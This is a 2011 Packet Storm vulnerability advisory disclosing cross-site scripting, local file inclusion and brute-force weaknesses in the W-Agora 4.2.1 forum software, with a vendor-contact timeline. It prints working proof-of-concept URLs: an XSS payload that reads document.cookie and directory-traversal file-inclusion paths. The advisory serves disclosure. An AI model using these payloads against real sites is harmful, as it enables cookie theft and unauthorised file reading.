W-Agora 4.2.1 Cross Site Scripting / Local File Inclusion

2011-03-18T00:00:00
ID PACKETSTORM:99458
Type packetstorm
Reporter MustLive
Modified 2011-03-18T00:00:00

Description

                                        
                                            `Hello list!  
  
I want to warn you about Cross-Site Scripting, Local File Inclusion and  
Brute Force vulnerabilities in W-Agora.  
  
SecurityVulns ID: 11499.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are W-Agora 4.2.1 and previous versions.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/current/getfile.php/support_howto/%22%3E%3Cbody%20onload=alert(document.cookie)%3E/1/  
  
Local File Inclusion (WASC-31):  
  
In folder conf:  
  
http://site/current/getfile.php/1  
  
http://site/current/index.php?bn=1  
  
http://site/current/list.php?bn=1  
  
In any folder (only on Windows-servers):  
  
http://site/current/getfile.php/..\1  
  
http://site/current/index.php?bn=..\1  
  
http://site/current/list.php?bn=..\1  
  
Brute Force (WASC-11):  
  
http://site/current/login.php  
  
------------  
Timeline:  
------------  
  
2011.01.15 - announced at my site.  
2011.01.16 - informed developers.  
2011.01.23 - developer answered and promised to try to fix all holes, which  
I informed him about in 2010-2011.  
2011.01.24 - gave additional suggestions for developer.  
2011.03.16 - disclosed at my site.  
  
I mentioned about these vulnerabilities at my site  
(http://websecurity.com.ua/4845/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
`